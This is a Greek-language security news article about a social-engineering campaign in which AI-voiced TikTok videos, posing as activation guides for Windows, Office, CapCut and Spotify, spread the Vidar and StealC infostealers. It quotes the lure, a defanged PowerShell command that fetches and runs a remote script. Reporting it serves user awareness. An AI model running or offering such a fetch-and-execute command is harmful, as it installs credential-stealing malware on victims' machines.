Προσοχή! Δημοφιλή βίντεο στο TikTok προωθούν εφαρμογές με malware

secnews.gr
IT Security News, Gadgets, Tweaks for Geeks and More

Προσοχή! Δημοφιλή βίντεο στο TikTok προωθούν εφαρμογές με malware
https://www.secnews.gr/652364/prosoxi-dimofili-video-tiktok-proothoun-efarmoges-malware/
Jun 27th 2025, 18:49
by Absenta Mia

Οι κυβερνοεγκληματίες έχουν ανακαλύψει ένα νέο πεδίο για τη διανομή malware, εκμεταλλευόμενοι τη μαζική βάση χρηστών και την αλγοριθμική απήχηση του TikTok.
Δείτε επίσης: Ο Donald Trump δίνει στο TikTok παράταση 90 ημερών


Μια εξελιγμένη εκστρατεία social engineering έχει εμφανιστεί, χρησιμοποιώντας βίντεο που δημιουργούνται με τεχνητή νοημοσύνη για να εξαπατήσουν χρήστες ώστε να κατεβάσουν επικίνδυνο κακόβουλο λογισμικό κλοπής δεδομένων, μεταμφιεσμένο ως οδηγοί ενεργοποίησης λογισμικού.
Αυτά τα παραπλανητικά βίντεο υπόσχονται να βοηθήσουν τους χρήστες να ενεργοποιήσουν νόμιμες εφαρμογές, όπως τα Windows OS, Microsoft Office, CapCut και Spotify, αλλά στην πραγματικότητα εγκαθιστούν τα διαβόητα κακόβουλα λογισμικά Vidar και StealC, χωρίς τη γνώση των θυμάτων.
Η εκστρατεία αυτή αντιπροσωπεύει μια σημαντική εξέλιξη στις τακτικές διανομής κακόβουλου λογισμικού, απομακρυνόμενη από τις παραδοσιακές μεθόδους του διαδικτύου και εκμεταλλευόμενη την εμπιστοσύνη και τη διάδραση που προσφέρουν οι πλατφόρμες κοινωνικής δικτύωσης.
Σε αντίθεση με τις παραδοσιακές επιθέσεις που βασίζονται σε κακόβουλους ιστότοπους ή επιθέσεις ηλεκτρονικού phishing, η συγκεκριμένη εκστρατεία ενσωματώνει όλα τα στοιχεία του social engineering απευθείας μέσα στο περιεχόμενο των βίντεο, καθιστώντας τον εντοπισμό της ιδιαίτερα δύσκολο για τα συστήματα ασφαλείας.
Δείτε ακόμα: TikTok for Artists: Νέα πλατφόρμα για καλλιτέχνες μουσικούς
Οι επιτιθέμενοι εκμεταλλεύονται τη viral φύση του TikTok, με ένα από τα κακόβουλα βίντεο να συγκεντρώνει σχεδόν 500.000 προβολές, πάνω από 20.000 επιδοκιμασίες (likes) και περισσότερα από 100 σχόλια — γεγονός που αποδεικνύει την ανησυχητική εμβέλεια και αποτελεσματικότητα της καμπάνιας.
Προσοχή! Δημοφιλή βίντεο στο TikTok προωθούν εφαρμογές με malware


Οι αναλυτές της Trend Micro εντόπισαν πολλούς λογαριασμούς TikTok που εμπλέκονται στη συγκεκριμένη επιχείρηση, όπως οι @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc και @digitaldreams771, οι οποίοι έχουν πλέον απενεργοποιηθεί.
Οι ερευνητές παρατήρησαν ότι οι εν λόγω λογαριασμοί δημοσίευαν εντυπωσιακά παρόμοια βίντεο χωρίς πρόσωπα, με φωνές παραγόμενες από τεχνητή νοημοσύνη, γεγονός που υποδηλώνει μια αυτοματοποιημένη διαδικασία παραγωγής, σχεδιασμένη για μαζική κλίμακα. Η τεχνική πολυπλοκότητα της επίθεσης γίνεται εμφανής μέσα από τη μεθοδολογία υλοποίησής της.
Δείτε επίσης: Η Ευρωπαϊκή Επιτροπή κατηγορεί το TikTok για παραβίαση του DSA
Τα θύματα καθοδηγούνται να ανοίξουν το PowerShell και να εκτελέσουν μια φαινομενικά αβλαβή εντολή: iex (irm hxxps://allaivo[.]me/spotify). Το συγκεκριμένο PowerShell script ενεργοποιεί μια πολυ-σταδιακή διαδικασία μόλυνσης, η οποία αξιοποιεί εξελιγμένες τεχνικές αποφυγής εντοπισμού.
Πηγή: cybersecuritynews



You are receiving this email because you subscribed to this feed at https://blogtrottr.com
If you no longer wish to receive these emails, you can unsubscribe here:
https://blogtrottr.com/unsubscribe/nfz/3xfHTz